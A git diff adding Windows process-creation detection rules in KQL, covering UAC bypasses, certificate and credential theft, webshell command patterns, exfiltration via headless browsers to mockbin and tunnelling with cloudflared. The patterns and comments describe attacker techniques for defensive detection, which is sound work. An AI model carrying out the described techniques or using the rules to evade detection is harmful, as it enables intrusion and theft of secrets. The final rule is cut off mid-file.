diff --git a/KQL/rules/windows/process_creation/automated_collection_command_prompt.kql b/KQL/rules/windows/process_creation/automated_collection_command_prompt.kql
new file mode 100644
index 00000000..60b39179
--- /dev/null
+++ b/KQL/rules/windows/process_creation/automated_collection_command_prompt.kql
@@ -0,0 +1,10 @@
+// Title: Automated Collection Command Prompt
+// Author: frack113
+// Date: 2021-07-28
+// Level: medium
+// Description: Once established within a system or network, an adversary may use automated techniques for collecting internal data.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1119, attack.credential-access, attack.t1552.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".doc" or ProcessCommandLine contains ".docx" or ProcessCommandLine contains ".xls" or ProcessCommandLine contains ".xlsx" or ProcessCommandLine contains ".ppt" or ProcessCommandLine contains ".pptx" or ProcessCommandLine contains ".rtf" or ProcessCommandLine contains ".pdf" or ProcessCommandLine contains ".txt") and ((ProcessCommandLine contains "dir " and ProcessCommandLine contains " /b " and ProcessCommandLine contains " /s ") or ((ProcessCommandLine contains " /e " or ProcessCommandLine contains " /si ") and ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl.kql b/KQL/rules/windows/process_creation/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl.kql
new file mode 100644
index 00000000..39c09b7d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl.kql
@@ -0,0 +1,12 @@
+// Title: AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl
+// Author: Julia Fomina, oscd.community
+// Date: 2020-10-06
+// Level: medium
+// Description: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1216
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "winrm" and ((ProcessCommandLine contains "format:pretty" or ProcessCommandLine contains "format:\"pretty\"" or ProcessCommandLine contains "format:\"text\"" or ProcessCommandLine contains "format:text") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/bad_opsec_defaults_sacrificial_processes_with_improper_arguments.kql b/KQL/rules/windows/process_creation/bad_opsec_defaults_sacrificial_processes_with_improper_arguments.kql
new file mode 100644
index 00000000..f158ee74
--- /dev/null
+++ b/KQL/rules/windows/process_creation/bad_opsec_defaults_sacrificial_processes_with_improper_arguments.kql
@@ -0,0 +1,14 @@
+// Title: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
+// Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)
+// Date: 2020-10-23
+// Level: high
+// Description: Detects attackers using tooling with bad opsec defaults.
+// E.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.
+// One trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ((ProcessCommandLine endswith "regasm.exe" and FolderPath endswith "\\regasm.exe") or (ProcessCommandLine endswith "regsvcs.exe" and FolderPath endswith "\\regsvcs.exe") or (ProcessCommandLine endswith "regsvr32.exe" and FolderPath endswith "\\regsvr32.exe") or (ProcessCommandLine endswith "rundll32.exe" and FolderPath endswith "\\rundll32.exe") or (ProcessCommandLine endswith "WerFault.exe" and FolderPath endswith "\\WerFault.exe")) and (not(((ProcessCommandLine endswith "rundll32.exe" and FolderPath endswith "\\rundll32.exe" and InitiatingProcessCommandLine contains "--uninstall " and (InitiatingProcessFolderPath contains "\\AppData\\Local\\BraveSoftware\\Brave-Browser\\Application\\" or InitiatingProcessFolderPath contains "\\AppData\\Local\\Google\\Chrome\\Application\\") and InitiatingProcessFolderPath endswith "\\Installer\\setup.exe") or (ProcessCommandLine endswith "rundll32.exe" and FolderPath endswith "\\rundll32.exe" and InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\EdgeUpdate\\Install\\{"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/base64_encoded_powershell_command_detected.kql b/KQL/rules/windows/process_creation/base64_encoded_powershell_command_detected.kql
new file mode 100644
index 00000000..4cea30cb
--- /dev/null
+++ b/KQL/rules/windows/process_creation/base64_encoded_powershell_command_detected.kql
@@ -0,0 +1,12 @@
+// Title: Base64 Encoded PowerShell Command Detected
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-01-29
+// Level: high
+// Description: Detects usage of the "FromBase64String" function in the commandline which is used to decode a base64 encoded string
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1027, attack.defense-evasion, attack.execution, attack.t1140, attack.t1059.001
+// False Positives:
+//   - Administrative script libraries
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "::FromBase64String("
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/base64_mz_header_in_commandline.kql b/KQL/rules/windows/process_creation/base64_mz_header_in_commandline.kql
new file mode 100644
index 00000000..cb703139
--- /dev/null
+++ b/KQL/rules/windows/process_creation/base64_mz_header_in_commandline.kql
@@ -0,0 +1,12 @@
+// Title: Base64 MZ Header In CommandLine
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-12
+// Level: high
+// Description: Detects encoded base64 MZ header in the commandline
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "TVqQAAMAAAAEAAAA" or ProcessCommandLine contains "TVpQAAIAAAAEAA8A" or ProcessCommandLine contains "TVqAAAEAAAAEABAA" or ProcessCommandLine contains "TVoAAAAAAAAAAAAA" or ProcessCommandLine contains "TVpTAQEAAAAEAAAA"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/binary_proxy_execution_via_dotnet_trace_exe.kql b/KQL/rules/windows/process_creation/binary_proxy_execution_via_dotnet_trace_exe.kql
new file mode 100644
index 00000000..e40790aa
--- /dev/null
+++ b/KQL/rules/windows/process_creation/binary_proxy_execution_via_dotnet_trace_exe.kql
@@ -0,0 +1,12 @@
+// Title: Binary Proxy Execution Via Dotnet-Trace.EXE
+// Author: Jimmy Bayne (@bohops)
+// Date: 2024-01-02
+// Level: medium
+// Description: Detects commandline arguments for executing a child process via dotnet-trace.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1218
+// False Positives:
+//   - Legitimate usage of the utility in order to debug and trace a program.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-- " and ProcessCommandLine contains "collect") and (FolderPath endswith "\\dotnet-trace.exe" or ProcessVersionInfoOriginalFileName =~ "dotnet-trace.dll")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/bitlockertogo_exe_execution.kql b/KQL/rules/windows/process_creation/bitlockertogo_exe_execution.kql
new file mode 100644
index 00000000..ab552535
--- /dev/null
+++ b/KQL/rules/windows/process_creation/bitlockertogo_exe_execution.kql
@@ -0,0 +1,15 @@
+// Title: BitLockerTogo.EXE Execution
+// Author: Josh Nickels, mttaggart
+// Date: 2024-07-11
+// Level: low
+// Description: Detects the execution of "BitLockerToGo.EXE".
+// BitLocker To Go is BitLocker Drive Encryption on removable data drives. This feature includes the encryption of, USB flash drives, SD cards, External hard disk drives, Other drives that are formatted by using the NTFS, FAT16, FAT32, or exFAT file system.
+// This is a rarely used application and usage of it at all is worth investigating.
+// Malware such as Lumma stealer has been seen using this process as a target for process hollowing.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+//   - Legitimate usage of BitLockerToGo.exe to encrypt portable devices.
+
+DeviceProcessEvents
+| where FolderPath endswith "\\BitLockerToGo.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/boot_configuration_tampering_via_bcdedit_exe.kql b/KQL/rules/windows/process_creation/boot_configuration_tampering_via_bcdedit_exe.kql
new file mode 100644
index 00000000..6dd33a8b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/boot_configuration_tampering_via_bcdedit_exe.kql
@@ -0,0 +1,12 @@
+// Title: Boot Configuration Tampering Via Bcdedit.EXE
+// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
+// Date: 2019-10-24
+// Level: high
+// Description: Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "bootstatuspolicy" and ProcessCommandLine contains "ignoreallfailures") or (ProcessCommandLine contains "recoveryenabled" and ProcessCommandLine contains "no")) and (FolderPath endswith "\\bcdedit.exe" or ProcessVersionInfoOriginalFileName =~ "bcdedit.exe") and ProcessCommandLine contains "set"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/browser_execution_in_headless_mode.kql b/KQL/rules/windows/process_creation/browser_execution_in_headless_mode.kql
new file mode 100644
index 00000000..1d465f67
--- /dev/null
+++ b/KQL/rules/windows/process_creation/browser_execution_in_headless_mode.kql
@@ -0,0 +1,10 @@
+// Title: Browser Execution In Headless Mode
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-09-12
+// Level: low
+// Description: Detects execution of Chromium based browser in headless mode
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.command-and-control, attack.t1105, attack.t1564.003
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "--headless" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/browser_started_with_remote_debugging.kql b/KQL/rules/windows/process_creation/browser_started_with_remote_debugging.kql
new file mode 100644
index 00000000..3470364b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/browser_started_with_remote_debugging.kql
@@ -0,0 +1,10 @@
+// Title: Browser Started with Remote Debugging
+// Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-27
+// Level: medium
+// Description: Detects browsers starting with the remote debugging flags. Which is a technique often used to perform browser injection attacks
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.collection, attack.t1185
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " --remote-debugging-" or (ProcessCommandLine contains " -start-debugger-server" and FolderPath endswith "\\firefox.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/bypass_uac_via_cmstp.kql b/KQL/rules/windows/process_creation/bypass_uac_via_cmstp.kql
new file mode 100644
index 00000000..9f088b8a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/bypass_uac_via_cmstp.kql
@@ -0,0 +1,12 @@
+// Title: Bypass UAC via CMSTP
+// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
+// Date: 2019-10-24
+// Level: high
+// Description: Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002, attack.t1218.003
+// False Positives:
+//   - Legitimate use of cmstp.exe utility by legitimate user
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/s" or ProcessCommandLine contains "-s" or ProcessCommandLine contains "/au" or ProcessCommandLine contains "-au" or ProcessCommandLine contains "/ni" or ProcessCommandLine contains "-ni") and (FolderPath endswith "\\cmstp.exe" or ProcessVersionInfoOriginalFileName =~ "CMSTP.EXE")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/bypass_uac_via_fodhelper_exe.kql b/KQL/rules/windows/process_creation/bypass_uac_via_fodhelper_exe.kql
new file mode 100644
index 00000000..d66ad7d9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/bypass_uac_via_fodhelper_exe.kql
@@ -0,0 +1,12 @@
+// Title: Bypass UAC via Fodhelper.exe
+// Author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community
+// Date: 2019-10-24
+// Level: high
+// Description: Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+// False Positives:
+//   - Legitimate use of fodhelper.exe utility by legitimate user
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\fodhelper.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/bypass_uac_via_wsreset_exe.kql b/KQL/rules/windows/process_creation/bypass_uac_via_wsreset_exe.kql
new file mode 100644
index 00000000..5f35acbd
--- /dev/null
+++ b/KQL/rules/windows/process_creation/bypass_uac_via_wsreset_exe.kql
@@ -0,0 +1,12 @@
+// Title: Bypass UAC via WSReset.exe
+// Author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth
+// Date: 2019-10-24
+// Level: high
+// Description: Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002
+// False Positives:
+//   - Unknown sub processes of Wsreset.exe
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\wsreset.exe" and (not((FolderPath endswith "\\conhost.exe" or ProcessVersionInfoOriginalFileName =~ "CONHOST.EXE")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/c_il_code_compilation_via_ilasm_exe.kql b/KQL/rules/windows/process_creation/c_il_code_compilation_via_ilasm_exe.kql
new file mode 100644
index 00000000..9d20434b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/c_il_code_compilation_via_ilasm_exe.kql
@@ -0,0 +1,10 @@
+// Title: C# IL Code Compilation Via Ilasm.EXE
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-05-07
+// Level: medium
+// Description: Detects the use of "Ilasm.EXE" in order to compile C# intermediate (IL) code to EXE or DLL.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1127
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " /dll" or ProcessCommandLine contains " /exe") and (FolderPath endswith "\\ilasm.exe" or ProcessVersionInfoOriginalFileName =~ "ilasm.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/cab_file_extraction_via_wusa_exe_from_potentially_suspicious_paths.kql b/KQL/rules/windows/process_creation/cab_file_extraction_via_wusa_exe_from_potentially_suspicious_paths.kql
new file mode 100644
index 00000000..9c770818
--- /dev/null
+++ b/KQL/rules/windows/process_creation/cab_file_extraction_via_wusa_exe_from_potentially_suspicious_paths.kql
@@ -0,0 +1,10 @@
+// Title: Cab File Extraction Via Wusa.EXE From Potentially Suspicious Paths
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-05
+// Level: high
+// Description: Detects the execution of the "wusa.exe" (Windows Update Standalone Installer) utility to extract ".cab" files using the "/extract" argument from potentially suspicious paths.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\Appdata\\Local\\Temp\\") and (ProcessCommandLine contains "/extract:" and FolderPath endswith "\\wusa.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/capture_credentials_with_rpcping_exe.kql b/KQL/rules/windows/process_creation/capture_credentials_with_rpcping_exe.kql
new file mode 100644
index 00000000..093675d4
--- /dev/null
+++ b/KQL/rules/windows/process_creation/capture_credentials_with_rpcping_exe.kql
@@ -0,0 +1,12 @@
+// Title: Capture Credentials with Rpcping.exe
+// Author: Julia Fomina, oscd.community
+// Date: 2020-10-09
+// Level: medium
+// Description: Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "-s" or ProcessCommandLine contains "/s" or ProcessCommandLine contains "–s" or ProcessCommandLine contains "—s" or ProcessCommandLine contains "―s") and (FolderPath endswith "\\RpcPing.exe" or ProcessVersionInfoOriginalFileName =~ "\\RpcPing.exe")) and ((ProcessCommandLine contains "ncacn_np" and (ProcessCommandLine contains "-t" or ProcessCommandLine contains "/t" or ProcessCommandLine contains "–t" or ProcessCommandLine contains "—t" or ProcessCommandLine contains "―t")) or (ProcessCommandLine contains "NTLM" and (ProcessCommandLine contains "-u" or ProcessCommandLine contains "/u" or ProcessCommandLine contains "–u" or ProcessCommandLine contains "—u" or ProcessCommandLine contains "―u")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/certificate_exported_via_certutil_exe.kql b/KQL/rules/windows/process_creation/certificate_exported_via_certutil_exe.kql
new file mode 100644
index 00000000..21202da4
--- /dev/null
+++ b/KQL/rules/windows/process_creation/certificate_exported_via_certutil_exe.kql
@@ -0,0 +1,12 @@
+// Title: Certificate Exported Via Certutil.EXE
+// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-15
+// Level: medium
+// Description: Detects the execution of the certutil with the "exportPFX" flag which allows the utility to export certificates.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027
+// False Positives:
+//   - There legitimate reasons to export certificates. Investigate the activity to determine if it's benign
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-exportPFX " or ProcessCommandLine contains "/exportPFX " or ProcessCommandLine contains "–exportPFX " or ProcessCommandLine contains "—exportPFX " or ProcessCommandLine contains "―exportPFX ") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/certificate_exported_via_powershell.kql b/KQL/rules/windows/process_creation/certificate_exported_via_powershell.kql
new file mode 100644
index 00000000..a90f4a67
--- /dev/null
+++ b/KQL/rules/windows/process_creation/certificate_exported_via_powershell.kql
@@ -0,0 +1,12 @@
+// Title: Certificate Exported Via PowerShell
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-18
+// Level: medium
+// Description: Detects calls to cmdlets that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.execution, attack.t1552.004, attack.t1059.001
+// False Positives:
+//   - Legitimate certificate exports by administrators. Additional filters might be required.
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "Export-PfxCertificate " or ProcessCommandLine contains "Export-Certificate "
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/change_default_file_association_to_executable_via_assoc.kql b/KQL/rules/windows/process_creation/change_default_file_association_to_executable_via_assoc.kql
new file mode 100644
index 00000000..deff9744
--- /dev/null
+++ b/KQL/rules/windows/process_creation/change_default_file_association_to_executable_via_assoc.kql
@@ -0,0 +1,11 @@
+// Title: Change Default File Association To Executable Via Assoc
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-28
+// Level: high
+// Description: Detects when a program changes the default file association of any extension to an executable.
+// When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.001
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "assoc " and ProcessCommandLine contains "exefile") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")) and (not(ProcessCommandLine contains ".exe=exefile"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/change_default_file_association_via_assoc.kql b/KQL/rules/windows/process_creation/change_default_file_association_via_assoc.kql
new file mode 100644
index 00000000..337598da
--- /dev/null
+++ b/KQL/rules/windows/process_creation/change_default_file_association_via_assoc.kql
@@ -0,0 +1,13 @@
+// Title: Change Default File Association Via Assoc
+// Author: Timur Zinniatullin, oscd.community
+// Date: 2019-10-21
+// Level: low
+// Description: Detects file association changes using the builtin "assoc" command.
+// When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.001
+// False Positives:
+//   - Admin activity
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "assoc" and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/change_powershell_policies_to_an_insecure_level.kql b/KQL/rules/windows/process_creation/change_powershell_policies_to_an_insecure_level.kql
new file mode 100644
index 00000000..2e574132
--- /dev/null
+++ b/KQL/rules/windows/process_creation/change_powershell_policies_to_an_insecure_level.kql
@@ -0,0 +1,12 @@
+// Title: Change PowerShell Policies to an Insecure Level
+// Author: frack113
+// Date: 2021-11-01
+// Level: medium
+// Description: Detects changing the PowerShell script execution policy to a potentially insecure level using the "-ExecutionPolicy" flag.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+//   - Administrator scripts
+
+DeviceProcessEvents
+| where (((ProcessVersionInfoOriginalFileName in~ ("powershell_ise.exe", "PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) and (ProcessCommandLine contains "Bypass" or ProcessCommandLine contains "Unrestricted") and (ProcessCommandLine contains "-executionpolicy " or ProcessCommandLine contains " -ep " or ProcessCommandLine contains " -exec ")) and (not(((ProcessCommandLine contains "-NoProfile -ExecutionPolicy Bypass -File \"C:\\Program Files\\PowerShell\\7\\" or ProcessCommandLine contains "-NoProfile -ExecutionPolicy Bypass -File \"C:\\Program Files (x86)\\PowerShell\\7\\") and (InitiatingProcessFolderPath in~ ("C:\\Windows\\SysWOW64\\msiexec.exe", "C:\\Windows\\System32\\msiexec.exe"))))) and (not(((ProcessCommandLine contains "-ExecutionPolicy ByPass -File \"C:\\Program Files\\Avast Software\\Avast" or ProcessCommandLine contains "-ExecutionPolicy ByPass -File \"C:\\Program Files (x86)\\Avast Software\\Avast\\") and (InitiatingProcessFolderPath contains "C:\\Program Files\\Avast Software\\Avast\\" or InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\Avast Software\\Avast\\" or InitiatingProcessFolderPath contains "\\instup.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/changing_existing_service_imagepath_value_via_reg_exe.kql b/KQL/rules/windows/process_creation/changing_existing_service_imagepath_value_via_reg_exe.kql
new file mode 100644
index 00000000..d31c066e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/changing_existing_service_imagepath_value_via_reg_exe.kql
@@ -0,0 +1,12 @@
+// Title: Changing Existing Service ImagePath Value Via Reg.EXE
+// Author: frack113
+// Date: 2021-12-30
+// Level: medium
+// Description: Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.
+// Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.
+// Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1574.011
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "add " and ProcessCommandLine contains "SYSTEM\\CurrentControlSet\\Services\\" and ProcessCommandLine contains " ImagePath ") and FolderPath endswith "\\reg.exe") and (ProcessCommandLine contains " -d " or ProcessCommandLine contains " /d " or ProcessCommandLine contains " –d " or ProcessCommandLine contains " —d " or ProcessCommandLine contains " ―d ")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/chopper_webshell_process_pattern.kql b/KQL/rules/windows/process_creation/chopper_webshell_process_pattern.kql
new file mode 100644
index 00000000..a9c4a33c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/chopper_webshell_process_pattern.kql
@@ -0,0 +1,10 @@
+// Title: Chopper Webshell Process Pattern
+// Author: Florian Roth (Nextron Systems), MSTI (query)
+// Date: 2022-10-01
+// Level: high
+// Description: Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.discovery, attack.t1505.003, attack.t1018, attack.t1033, attack.t1087
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "&ipconfig&echo" or ProcessCommandLine contains "&quser&echo" or ProcessCommandLine contains "&whoami&echo" or ProcessCommandLine contains "&c:&echo" or ProcessCommandLine contains "&cd&echo" or ProcessCommandLine contains "&dir&echo" or ProcessCommandLine contains "&echo [E]" or ProcessCommandLine contains "&echo [S]") and (FolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/chromium_browser_headless_execution_to_mockbin_like_site.kql b/KQL/rules/windows/process_creation/chromium_browser_headless_execution_to_mockbin_like_site.kql
new file mode 100644
index 00000000..6d2ad8c8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/chromium_browser_headless_execution_to_mockbin_like_site.kql
@@ -0,0 +1,10 @@
+// Title: Chromium Browser Headless Execution To Mockbin Like Site
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-09-11
+// Level: high
+// Description: Detects the execution of a Chromium based browser process with the "headless" flag and a URL pointing to the mockbin.org service (which can be used to exfiltrate data).
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "--headless" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe") and (ProcessCommandLine contains "://run.mocky" or ProcessCommandLine contains "://mockbin")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/chromium_browser_instance_executed_with_custom_extension.kql b/KQL/rules/windows/process_creation/chromium_browser_instance_executed_with_custom_extension.kql
new file mode 100644
index 00000000..5d987340
--- /dev/null
+++ b/KQL/rules/windows/process_creation/chromium_browser_instance_executed_with_custom_extension.kql
@@ -0,0 +1,12 @@
+// Title: Chromium Browser Instance Executed With Custom Extension
+// Author: Aedan Russell, frack113, X__Junior (Nextron Systems)
+// Date: 2022-06-19
+// Level: medium
+// Description: Detects a Chromium based browser process with the 'load-extension' flag to start a instance with a custom extension
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1176.001
+// False Positives:
+//   - Usage of Chrome Extensions in testing tools such as BurpSuite will trigger this alert
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "--load-extension=" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/cloudflared_portable_execution.kql b/KQL/rules/windows/process_creation/cloudflared_portable_execution.kql
new file mode 100644
index 00000000..d99d96f1
--- /dev/null
+++ b/KQL/rules/windows/process_creation/cloudflared_portable_execution.kql
@@ -0,0 +1,12 @@
+// Title: Cloudflared Portable Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-12-20
+// Level: medium
+// Description: Detects the execution of the "cloudflared" binary from a non standard location.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1090.001
+// False Positives:
+//   - Legitimate usage of Cloudflared portable versions
+
+DeviceProcessEvents
+| where FolderPath endswith "\\cloudflared.exe" and (not((FolderPath contains ":\\Program Files (x86)\\cloudflared\\" or FolderPath contains ":\\Program Files\\cloudflared\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/cloudflared_quick_tunnel_execution.kql b/KQL/rules/windows/process_creation/cloudflared_quick_tunnel_execution.kql
new file mode 100644
index 00000000..ff33f70f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/cloudflared_quick_tunnel_execution.kql
@@ -0,0 +1,14 @@
+// Title: Cloudflared Quick Tunnel Execution
+// Author: Sajid Nawaz Khan
+// Date: 2023-12-20
+// Level: medium
+// Description: Detects creation of an ad-hoc Cloudflare Quick Tunnel, which can be used to tunnel local services such as HTTP, RDP, SSH and SMB.
+// The free TryCloudflare Quick Tunnel will generate a random subdomain on trycloudflare[.]com, following a call to api[.]trycloudflare[.]com.
+// The tool has been observed in use by threat groups including Akira ransomware.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1090.001
+// False Positives:
+//   - Legitimate usage of Cloudflare Quick Tunnel
+
+DeviceProcessEvents
